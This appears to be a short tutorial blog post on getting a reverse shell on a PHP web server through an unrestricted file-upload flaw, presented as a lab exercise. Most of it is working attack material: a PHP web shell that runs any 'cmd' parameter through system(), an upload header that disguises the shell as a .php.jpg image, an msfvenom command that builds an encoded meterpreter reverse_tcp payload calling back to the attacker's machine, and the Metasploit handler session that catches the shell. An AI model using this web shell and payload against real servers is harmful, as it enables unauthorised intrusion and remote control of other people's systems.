Metasploit, Reverse shell

Before we start

– for educational purposes only

What you need

  • Target machine (192.168.0.102) running a PHP app that lets you upload files
  • Kali Linux machine (192.168.0.104)

Start

To start playing with reverse shells and Metasploit you need an app that lets you upload a php file or a php.jpg file :D.

How to test

Try to upload a simple PHP file; if you run into any problem, play with the extension or the content type.

Test file

Content-Disposition: form-data; name="file"; filename="cmd.php.jpg"
Content-Type: application/x-php

<?php
	// runs whatever is passed in the "cmd" query parameter and prints the output
	if(isset($_GET['cmd'])) {
		echo "<pre>";
		system($_GET['cmd']);
		echo "</pre>";
	}else{
		echo "lol";
	}
?>

Confirm

You have to confirm that the file was uploaded and that you can execute it, for example by visiting the URL 192.168.0.102/uploads/cmd.php.jpg?cmd=ls -la

Metasploit / Kali & Update

I tested this on Metasploit v4.16.21-dev; if your version is outdated, consider updating:

apt update; apt install metasploit-framework

Generate the payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg

Important: you have to edit ‘msfvenom2.php.jpg’ and wrap the payload in

<?php ... ?>

If you are ready, upload this file to the server.

Hammer time

In the msf console, type

msf > 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.104
LHOST => 192.168.0.104
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

and visit this page: 192.168.0.102/uploads/msfvenom2.php.jpg
Bumm, now you should have a reverse shell. Type something in the msf console like “ls” or “pwd”; for more options type “shell”.